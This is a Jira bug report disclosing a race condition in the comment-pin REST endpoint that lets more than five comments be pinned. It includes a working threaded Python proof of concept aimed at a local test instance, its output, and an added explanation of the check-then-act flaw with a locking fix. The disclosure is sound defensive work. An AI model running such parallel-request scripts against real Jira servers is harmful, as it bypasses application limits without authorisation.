Jira Data Center / JRASERVER-79053

Race Condition allows sending multiple parallel requests at the same time to bypass the limit of business logic


    • Type: Bug
    • Resolution: Unresolved
    • Priority: Low
    • Fix Version/s: None
    • Affects Version/s: 9.7.0, 10.3.7, 10.7.3, 11.0.0
    • Component/s: REST API
    • Labels: None

      Issue Summary

      A race condition in some features allows sending multiple parallel requests at the same time to bypass business-logic limits.

      Steps to Reproduce

      • Affected feature: Issue -> Pin comment
        • Endpoint: PUT http://[jira-url]/rest/api/2/issue/<issueId>/comment/<commentID>/pin
        • Description: Jira limits the number of pinned comments to 5 in a sprint, but by exploiting the race condition a user can pin more than 5.
        • Use a script or an application testing tool such as Burp Suite Repeater to send parallel REST API requests to the pin endpoint.
      • The Python script below was used to test locally:
        import threading

        import requests

        # Local test instance; issue 10901 is the issue the comments belong to.
        base_url = "http://localhost:1073/rest/api/2/issue/10901/comment/"
        comment_ids = ["10402", "10403", "10404", "10405", "10406", "10407", "10408", "10409"]  # Replace with actual IDs
        additional_path = "/pin"

        # Session cookie and XSRF token of the local test user (values from the reporter's test session).
        headers = {
            "Content-Type": "application/json",
            "Cookie": "JSESSIONID=B1B70276EBFEB95A184738E5EF286CB5; atlassian.xsrf.token=B7I1-V97B-LRN9-WV6B_07341dfb6fb36475553896cf45db99c8446d0a34_lin"
        }

        payload = 'true'  # request body: pin the comment

        def send_request(comment_id):
            url = f"{base_url}{comment_id}{additional_path}"
            print(url)
            response = requests.put(url, headers=headers, data=payload)
            print(f"Comment ID: {comment_id}, Status Code: {response.status_code}")

        # Start one thread per comment so the PUT requests are in flight at the same time.
        threads = []
        for comment_id in comment_ids:
            thread = threading.Thread(target=send_request, args=(comment_id,))
            threads.append(thread)
            thread.start()

        for thread in threads:
            thread.join()

         % python3 comment.py
        http://localhost:1073/rest/api/2/issue/10901/comment/10402/pin
        http://localhost:1073/rest/api/2/issue/10901/comment/10403/pin
        http://localhost:1073/rest/api/2/issue/10901/comment/10404/pin
        http://localhost:1073/rest/api/2/issue/10901/comment/10405/pin
        http://localhost:1073/rest/api/2/issue/10901/comment/10406/pin
        http://localhost:1073/rest/api/2/issue/10901/comment/10407/pin
        http://localhost:1073/rest/api/2/issue/10901/comment/10408/pin
        http://localhost:1073/rest/api/2/issue/10901/comment/10409/pin
        Comment ID: 10406, Status Code: 200
        Comment ID: 10403, Status Code: 200
        Comment ID: 10402, Status Code: 200
        Comment ID: 10407, Status Code: 200
        Comment ID: 10409, Status Code: 409
        Comment ID: 10408, Status Code: 200
        Comment ID: 10405, Status Code: 200
        Comment ID: 10404, Status Code: 200
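
The server-side pattern that produces this result is a check-then-act on the pin count: the limit is read, then the pin is written, and nothing stops several requests from reading the same count. The in-memory model below is an added illustration, not Jira's code, with constructed comment IDs; it shows the unsynchronised check letting all eight pins through and the same check done inside one critical section capping it at five. The `PinStore`, `pin_in_parallel` and `demo_*` names are all assumptions of this example.

```python
import threading

MAX_PINNED = 5  # the pinned-comment limit the report says Jira enforces

class PinStore:
    """Constructed in-memory stand-in for server-side pin state; not Jira's code."""
    def __init__(self):
        self.pinned = []
        self._lock = threading.Lock()

    def pin_racy(self, comment_id, window):
        # Check-then-act without synchronisation: parallel callers all read the old count.
        if len(self.pinned) >= MAX_PINNED:
            return 409
        window()  # models the gap between the check and the write
        self.pinned.append(comment_id)
        return 200

    def pin_atomic(self, comment_id):
        # Check and write in one critical section (DB: SELECT ... FOR UPDATE in one transaction).
        with self._lock:
            if len(self.pinned) >= MAX_PINNED:
                return 409
            self.pinned.append(comment_id)
            return 200

def pin_in_parallel(pin, comment_ids):
    # One thread per comment, as in the report's script; returns {id: status}.
    results = {}
    def worker(cid):
        results[cid] = pin(cid)
    threads = [threading.Thread(target=worker, args=(cid,)) for cid in comment_ids]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results

COMMENT_IDS = [str(10402 + i) for i in range(8)]  # constructed; mirrors the eight IDs above

def demo_racy():
    # (pins stored, 200 responses); the barrier makes every thread check before any writes,
    # so the race window is hit deterministically rather than by timing luck.
    store = PinStore()
    gate = threading.Barrier(len(COMMENT_IDS))
    results = pin_in_parallel(lambda cid: store.pin_racy(cid, gate.wait), COMMENT_IDS)
    return len(store.pinned), list(results.values()).count(200)

def demo_atomic():
    # (pins stored, 200 responses); the lock caps the result at exactly MAX_PINNED.
    store = PinStore()
    results = pin_in_parallel(store.pin_atomic, COMMENT_IDS)
    return len(store.pinned), list(results.values()).count(200)
```

In a real deployment the critical section belongs in the database (a transaction that locks the row holding the count, or a conditional update that only succeeds while the count is below the limit), since a per-process lock does not cover a multi-node cluster.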
        

      Expected Results

      Jira only pins 5 comments as that's the limit.

      Actual Results

      Jira allows more than 5 comments to be pinned.

      Reproduced on:
        • Jira v10.7.3
        • Jira v10.3.7 (customer version)
        • Jira v11.0.0 (latest version)
        • Jira v9.7.0 (the version in which the pin comment feature was first implemented)

      Workaround

      Currently there is no known workaround for this behavior. A workaround will be added here when available.

      Assignee: Unassigned
      Reporter: Binoy Nicholas